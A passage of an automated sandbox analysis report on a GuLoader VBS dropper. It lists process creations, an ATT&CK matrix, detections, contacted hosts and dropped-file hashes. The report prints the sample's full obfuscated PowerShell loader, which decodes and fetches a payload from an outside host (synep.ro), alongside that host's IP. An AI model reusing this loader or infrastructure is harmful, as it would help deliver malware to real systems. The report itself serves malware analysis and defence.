tusedrabsnondopolusdat.troofespertgarrhvir,i racuempimbol,= ostnandre k sw da -s orodefebnonpj phefedec n dtpara badespermylmles enotfiltepretmhj i. f rnwin emar.t rec. llewposteagnobkarmcu
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#stelography boligministerielt surterhvervet polenkas #>;$genforeningerne='brasilianske';<#decoloriser quatrains dksmands rentabelt #>;$stvregne=$orlos+$host.ui; function udgangstilladelsernes($lupulus){if ($stvregne) {$setaria++;}$revest=$velkomstens74+$lupulus.'length'-$setaria; for( $kropsvisiteret=4;$kropsvisiteret -lt $revest;$kropsvisiteret+=5){$spoilage=$kropsvisiteret;$salvelsesfuldest+=$lupulus[$kropsvisiteret];$prototraitor='kronvildtjagterne';}$salvelsesfuldest;}function skilleliniens($knothead){ & ($toilettaskens) ($knothead);}$tastetryk=udgangstilladelsernes 'guttm ndsoun uzpoliicanal i clvotaadavi/ pen ';$tastetryk+=udgangstilladelsernes 'quar5skyd.mine0love ski.(li nwfejlimul nfabrdudklo nanwf.ans a,a procnb,get,lie stem1udru0 dr,.roug0raci;phra offiwcensiriddnnatu6oakl4be i;ne.r fenaxover6ea t4ur n;nume urinrgyptvfili:sta,1 eff3dest1clee.disa0tred)fi a handg noneyellcjustk siso,rep/frod2 sto0h.ms1stil0gest0 p.o1cert0wi t1buri dyrefselvidubbr g,ueh,mpf tr oumorxl,du/defl1conv3post1n ws.sikk0 bog ';$cellerne=udgangstilladelsernes 'embruo bys oppequarrerog-surfa ukkgbro e ivsn fortigna ';$konstruktivt=udgangstilladelsernes 'gru.haf,at arttb depkachshoo,:flit/be.a/ gamsbatiyh lvndeutema ipfinu.fl trtohaobef./skoslquacyspecsactib trgasandd vov. paupstr ss,anpskij ';$kropsvisiteretndarbejde97=udgangstilladelsernes 'olde>gang ';$toilettaskens=udgangstilladelsernes ' ympi .ree sa.x raf ';$lykkejgers='spendynr';$proconscriptive='\udviklingsegnes.sep';skilleliniens (udgangstilladelsernes ' npa$fuyeg cu le,aconaivbfinaaakvaltr,n:o.lltcytoaideamfra b ud uun,rrchicsblse=ozon$ kreskannp lwvglas: staa st pwordp la d aliasn.wt p.lau,fr+trau$frynpgnisr ,enoappecduelo.enenkgeusf.rhc r nroarliclump fletswo ilym.vrefeetysk ');skilleliniens (udgangstilladelsernes 'arbe$forbg penlhandominubfackala sl bil: unmkgardoindod eneelan k aresa skek.ogroml.=bajo$kl pknarcocrainsy gschert prerunusupr.lkprint s ai ealvsammtakti.anidsche,pthyml n niope.ttrun(hoo $svinkun.orcheco no ptilfs f,rvsvinifades .ryiberitstroeantir .elenonctskifn ferdforpa.ildrgipsbsan edampj fordmelaejor 9disi7insi)star ');skilleliniens (udgangstilladelsernes ' nov[,ufonfjlde rovtejen.sextshunke marr genv .kki c,ncdi hebronp,kspogadiifrowntndit,algminf aekspnveneaballg ungefastr gre]wa.r:u,co: molsapple kogc ,unuanterreanidm,it carykrafp e.er nheogardtlaurotahaccivionighllump rang=outb ,usk[ stan a.he ovet wif.gcelsformebondc,andus ilrartoi ukkttoroyparopdolorsubpopreitcheeofriecsrskolserl oddtunfoyd ospskypeeksp]sg f: amm:dry,tpomeladdos nab1dila2 le ');$konstruktivt=$kodekser[0];$slbemaalsflyvningens=(udgangstilladelsernes 'buat$,utwgvinells lo ,aabmuriagravlt.ia:up om tusedrabsnondopolusdat.troofespertgarrhvir,i racuempimbol,= ostnandre k sw da -s orodefebnonpj phefedec n dtpara badespermylmles enotfiltepretmhj i. f rnwin emar.t rec. llewposteagnobkarmcu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#stelography boligministerielt surterhvervet polenkas #>;$genforeningerne='brasilianske';<#decoloriser quatrains dksmands rentabelt #>;$stvregne=$orlos+$host.ui; function udgangstilladelsernes($lupulus){if ($stvregne) {$setaria++;}$revest=$velkomstens74+$lupulus.'length'-$setaria; for( $kropsvisiteret=4;$kropsvisiteret -lt $revest;$kropsvisiteret+=5){$spoilage=$kropsvisiteret;$salvelsesfuldest+=$lupulus[$kropsvisiteret];$prototraitor='kronvildtjagterne';}$salvelsesfuldest;}function skilleliniens($knothead){ & ($toilettaskens) ($knothead);}$tastetryk=udgangstilladelsernes 'guttm ndsoun uzpoliicanal i clvotaadavi/ pen ';$tastetryk+=udgangstilladelsernes 'quar5skyd.mine0love ski.(li nwfejlimul nfabrdudklo nanwf.ans a,a procnb,get,lie stem1udru0 dr,.roug0raci;phra offiwcensiriddnnatu6oakl4be i;ne.r fenaxover6ea t4ur n;nume urinrgyptvfili:sta,1 eff3dest1clee.disa0tred)fi a handg noneyellcjustk siso,rep/frod2 sto0h.ms1stil0gest0 p.o1cert0wi t1buri dyrefselvidubbr g,ueh,mpf tr oumorxl,du/defl1conv3post1n ws.sikk0 bog ';$cellerne=udgangstilladelsernes 'embruo bys oppequarrerog-surfa ukkgbro e ivsn fortigna ';$konstruktivt=udgangstilladelsernes 'gru.haf,at arttb depkachshoo,:flit/be.a/ gamsbatiyh lvndeutema ipfinu.fl trtohaobef./skoslquacyspecsactib trgasandd vov. paupstr ss,anpskij ';$kropsvisiteretndarbejde97=udgangstilladelsernes 'olde>gang ';$toilettaskens=udgangstilladelsernes ' ympi .ree sa.x raf ';$lykkejgers='spendynr';$proconscriptive='\udviklingsegnes.sep';skilleliniens (udgangstilladelsernes ' npa$fuyeg cu le,aconaivbfinaaakvaltr,n:o.lltcytoaideamfra b ud uun,rrchicsblse=ozon$ kreskannp lwvglas: staa st pwordp la d aliasn.wt p.lau,fr+trau$frynpgnisr ,enoappecduelo.enenkgeusf.rhc r nroarliclump fletswo ilym.vrefeetysk ');skilleliniens (udgangstilladelsernes 'arbe$forbg penlhandominubfackala sl bil: unmkgardoindod eneelan k aresa skek.ogroml.=bajo$kl pknarcocrainsy gschert prerunusupr.lkprint s ai ealvsammtakti.anidsche,pthyml n niope.ttrun(hoo $svinkun.orcheco no ptilfs f,rvsvinifades .ryiberitstroeantir .elenonctskifn ferdforpa.ildrgipsbsan edampj fordmelaejor 9disi7insi)star ');skilleliniens (udgangstilladelsernes ' nov[,ufonfjlde rovtejen.sextshunke marr genv .kki c,ncdi hebronp,kspogadiifrowntndit,algminf aekspnveneaballg ungefastr gre]wa.r:u,co: molsapple kogc ,unuanterreanidm,it carykrafp e.er nheogardtlaurotahaccivionighllump rang=outb ,usk[ stan a.he ovet wif.gcelsformebondc,andus ilrartoi ukkttoroyparopdolorsubpopreitcheeofriecsrskolserl oddtunfoyd ospskypeeksp]sg f: amm:dry,tpomeladdos nab1dila2 le ');$konstruktivt=$kodekser[0];$slbemaalsflyvningens=(udgangstilladelsernes 'buat$,utwgvinells lo ,aabmuriagravlt.ia:up om tusedrabsnondopolusdat.troofespertgarrhvir,i racuempimbol,= ostnandre k sw da -s orodefebnonpj phefedec n dtpara badespermylmles enotfiltepretmhj i. f rnwin emar.t rec. llewposteagnobkarmcuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              O1CZjzItH1.vbs29%ReversingLabsScript-WScript.Trojan.Guloader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              synep.ro
              		31.14.12.249
              		truefalse
                		unknown
                gormezl_6777.6777.6777.677e
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://synep.ro/Lysbad.pspfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://synep.ro/Lysbad.pspXRpowershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://go.micropowershell.exe, 00000004.00000002.2161420250.00000280167C9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://synep.ropowershell.exe, 00000004.00000002.2161420250.000002801798D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://synep.ro/Lysbad.pspPpowershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://synep.ropowershell.exe, 00000004.00000002.2161420250.00000280171C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                31.14.12.249
                                		synep.roRomania
                                		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1540050
                                Start date and time:2024-10-23 11:29:22 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:O1CZjzItH1.vbs
                                renamed because original name is a hash value
                                Original Sample Name:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 72
                                • Number of non-executed functions: 17
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3228 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: O1CZjzItH1.vbs

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                05:30:15API Interceptor89x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                GTSCEGTSCentralEuropeAntelGermanyCZStima IMP87654 per l'esportazione dell'ultimo trimestre.vbsGet hashmaliciousGuLoaderBrowse
                                • 188.241.183.45
                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                • 193.85.134.61
                                M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                • 62.168.37.191
                                6fLnWSoXXD.elfGet hashmaliciousMiraiBrowse
                                • 94.42.225.72
                                bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                • 195.144.108.244
                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                • 185.236.86.89
                                TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                • 188.241.183.45
                                Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                • 188.241.183.45
                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 157.25.111.135
                                SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                • 89.44.138.129

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eUnicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                • 31.14.12.249
                                Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 31.14.12.249
                                AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 31.14.12.249
                                FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 31.14.12.249
                                REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 31.14.12.249
                                PO #89230.exeGet hashmaliciousAgentTeslaBrowse
                                • 31.14.12.249
                                Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 31.14.12.249
                                seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                • 31.14.12.249
                                necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                • 31.14.12.249
                                veryeasythingsevermadeforcreatenewthignsbetterthigns.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                • 31.14.12.249

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):8003
                                Entropy (8bit):4.840877972214509
                                Encrypted:false
                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                MD5:106D01F562D751E62B702803895E93E0
                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1628158735648508
                                Encrypted:false
                                SSDEEP:3:NlllulLhwlz:NllUO
                                MD5:F442CD24937ABD508058EA44FD91378E
                                SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54r042fw.vls.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffp2rddx.yxi.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
